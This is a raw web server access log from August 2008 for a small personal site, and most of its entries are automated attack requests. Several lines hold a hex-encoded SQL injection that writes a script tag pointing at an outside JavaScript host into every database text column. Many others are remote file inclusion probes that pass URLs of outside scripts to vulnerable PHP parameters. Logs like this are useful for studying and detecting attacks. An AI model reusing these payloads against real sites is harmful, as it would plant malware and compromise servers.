123.203.78.203 - - [21/Aug/2008:20:30:13 -0500] "GET /logs/access_log.1208044800?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
62.231.161.4 - - [21/Aug/2008:20:30:37 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.64"
190.138.152.162 - - [21/Aug/2008:20:31:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:20:31:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.98.250.45 - - [21/Aug/2008:20:31:55 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
66.98.250.45 - - [21/Aug/2008:20:31:55 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
64.22.89.194 - - [21/Aug/2008:20:32:49 -0500] "GET /classes/adodbt/sql.php?classes_dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
123.203.78.203 - - [21/Aug/2008:20:33:16 -0500] "GET /logs/access_log.1206230400?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
123.203.78.203 - - [21/Aug/2008:20:33:16 -0500] "GET /logs/access_log.1206230400?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
72.52.143.147 - - [21/Aug/2008:20:33:21 -0500] "GET //?sIncPath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 200 1243 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
72.52.143.147 - - [21/Aug/2008:20:33:22 -0500] "GET /logs//?sIncPath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 200 96221 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
70.85.201.66 - - [21/Aug/2008:20:33:27 -0500] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
70.85.201.66 - - [21/Aug/2008:20:33:27 -0500] "GET /init_basic.php?GALLERY_BASEDIR=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
123.203.78.203 - - [21/Aug/2008:20:33:38 -0500] "GET /logs/access_log.1208044800?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
123.203.78.203 - - [21/Aug/2008:20:33:38 -0500] "GET /logs/access_log.1208044800?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
64.22.89.194 - - [21/Aug/2008:20:34:22 -0500] "GET /logs/access_log.1214524800//include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:34:22 -0500] "GET //include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:20:34:22 -0500] "GET /logs//include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
213.33.84.163 - - [21/Aug/2008:20:34:34 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
213.33.84.163 - - [21/Aug/2008:20:34:34 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
80.67.19.125 - - [21/Aug/2008:20:36:05 -0500] "GET /logs/access_log.1214524800//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 372 "-""libwww-perl/5.808"
80.67.19.125 - - [21/Aug/2008:20:36:05 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.808"
80.67.19.125 - - [21/Aug/2008:20:36:06 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.808"
202.181.99.47 - - [21/Aug/2008:20:36:25 -0500] "GET /logs/access_log.1214524800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://utilz.info/a4? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
64.22.89.194 - - [21/Aug/2008:20:36:37 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
66.98.250.45 - - [21/Aug/2008:20:36:49 -0500] "GET /logs/access_log.1214524800/phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
208.115.34.17 - - [21/Aug/2008:20:36:57 -0500] "GET /logs/access_log.1204502400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
66.98.250.45 - - [21/Aug/2008:20:36:59 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
66.98.250.45 - - [21/Aug/2008:20:37:00 -0500] "GET ///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
66.98.250.45 - - [21/Aug/2008:20:37:00 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
66.98.250.45 - - [21/Aug/2008:20:37:56 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
62.231.161.4 - - [21/Aug/2008:20:39:43 -0500] "GET /logs/access_log.1214524800///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.64"
203.211.131.132 - - [21/Aug/2008:20:40:51 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
203.211.131.132 - - [21/Aug/2008:20:40:51 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
62.231.161.4 - - [21/Aug/2008:20:41:35 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:41:35 -0500] "GET /errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:41:36 -0500] "GET /logs/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
202.181.99.47 - - [21/Aug/2008:20:42:17 -0500] "GET /logs/access_log.1213488000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://utilz.info/a4? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:42:19 -0500] "GET /logs/access_log.1214179200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://utilz.info/a4? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:20:42:52 -0500] "GET /logs/access_log.1214524800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:42:53 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:42:53 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.64"
202.181.99.47 - - [21/Aug/2008:20:44:07 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://utilz.info/a4? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:44:08 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://utilz.info/a4? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:44:08 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://utilz.info/a4? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:20:45:48 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:45:49 -0500] "GET /errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:45:49 -0500] "GET /logs/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
203.29.191.86 - - [21/Aug/2008:20:48:42 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://search.live.com/results.aspx?q=old+school+tattoo+flash&form=QBRE""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
203.29.191.86 - - [21/Aug/2008:20:48:42 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
203.29.191.86 - - [21/Aug/2008:20:48:42 -0500] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
203.29.191.86 - - [21/Aug/2008:20:48:43 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.220.64.3 - - [21/Aug/2008:20:48:57 -0500] "GET /logs/access_log.1214438400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.110.50.122 - - [21/Aug/2008:20:49:01 -0500] "GET /logs/access_log.1199577600/components/com_simpleboard/image_upload.php?sbp=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
78.110.50.122 - - [21/Aug/2008:20:49:01 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
78.110.50.122 - - [21/Aug/2008:20:49:02 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:20:49:08 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.64"
206.220.64.3 - - [21/Aug/2008:20:49:20 -0500] "GET /logs/access_log.1205539200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:20:49:56 -0500] "GET /logs/access_log.1214524800/phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:49:57 -0500] "GET /phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:20:49:57 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.64"
204.15.10.22 - - [21/Aug/2008:20:50:03 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 354 "-""libwww-perl/5.810"
204.15.10.22 - - [21/Aug/2008:20:50:03 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
204.15.10.22 - - [21/Aug/2008:20:50:03 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
85.159.91.143 - - [21/Aug/2008:20:51:28 -0500] "GET /logs/access_log.1214438400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
85.159.91.143 - - [21/Aug/2008:20:51:28 -0500] "GET /logs/access_log.1214438400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
85.159.91.143 - - [21/Aug/2008:20:51:29 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.159.91.143 - - [21/Aug/2008:20:51:29 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.159.91.143 - - [21/Aug/2008:20:51:29 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
85.159.91.143 - - [21/Aug/2008:20:51:29 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.181.99.47 - - [21/Aug/2008:20:51:43 -0500] "GET /logs//include/lib.inc.php?site_path=http://utilz.info/a4? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:20:51:43 -0500] "GET //include/lib.inc.php?site_path=http://utilz.info/a4? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
78.110.50.122 - - [21/Aug/2008:20:51:50 -0500] "GET /logs/access_log.1214179200/components/com_simpleboard/image_upload.php?sbp=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
85.159.91.143 - - [21/Aug/2008:20:52:21 -0500] "GET /logs/access_log.1205539200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
85.159.91.143 - - [21/Aug/2008:20:52:22 -0500] "GET /logs/access_log.1205539200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
62.231.161.4 - - [21/Aug/2008:20:54:02 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.64"
204.11.245.202 - - [21/Aug/2008:20:54:32 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
204.11.245.202 - - [21/Aug/2008:20:54:32 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
204.11.245.202 - - [21/Aug/2008:20:54:32 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
62.231.161.4 - - [21/Aug/2008:20:55:42 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
203.211.131.132 - - [21/Aug/2008:20:56:00 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
74.6.22.119 - - [21/Aug/2008:20:56:41 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 2922 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.231.161.4 - - [21/Aug/2008:20:58:08 -0500] "GET /logs/access_log.1214438400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.64"
202.181.99.47 - - [21/Aug/2008:20:58:28 -0500] "GET /logs/access_log.1214438400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://utilz.info/a4? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
212.150.247.23 - - [21/Aug/2008:20:59:22 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 354 "-""libwww-perl/5.811"
212.150.247.23 - - [21/Aug/2008:20:59:25 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
212.150.247.23 - - [21/Aug/2008:20:59:26 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
62.231.161.4 - - [21/Aug/2008:21:00:18 -0500] "GET /logs/access_log.1214179200//?include_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:00:18 -0500] "GET //?include_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:00:20 -0500] "GET /logs//?include_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.64"
190.138.152.162 - - [21/Aug/2008:21:00:33 -0500] "GET /logs/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:21:00:34 -0500] "GET /excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:21:00:45 -0500] "GET /logs/access_log.1214179200/phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:00:51 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:01:43 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.64"
81.169.137.253 - - [21/Aug/2008:21:02:04 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:21:02:04 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
62.231.161.4 - - [21/Aug/2008:21:02:05 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.64"
81.169.137.253 - - [21/Aug/2008:21:02:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:21:02:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
62.231.161.4 - - [21/Aug/2008:21:03:06 -0500] "GET /logs/access_log.1213488000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:03:07 -0500] "GET /logs/access_log.1214179200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.64"
62.231.161.4 - - [21/Aug/2008:21:05:34 -0500] "GET /logs/access_log.1214438400///vwar/backup/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.64"
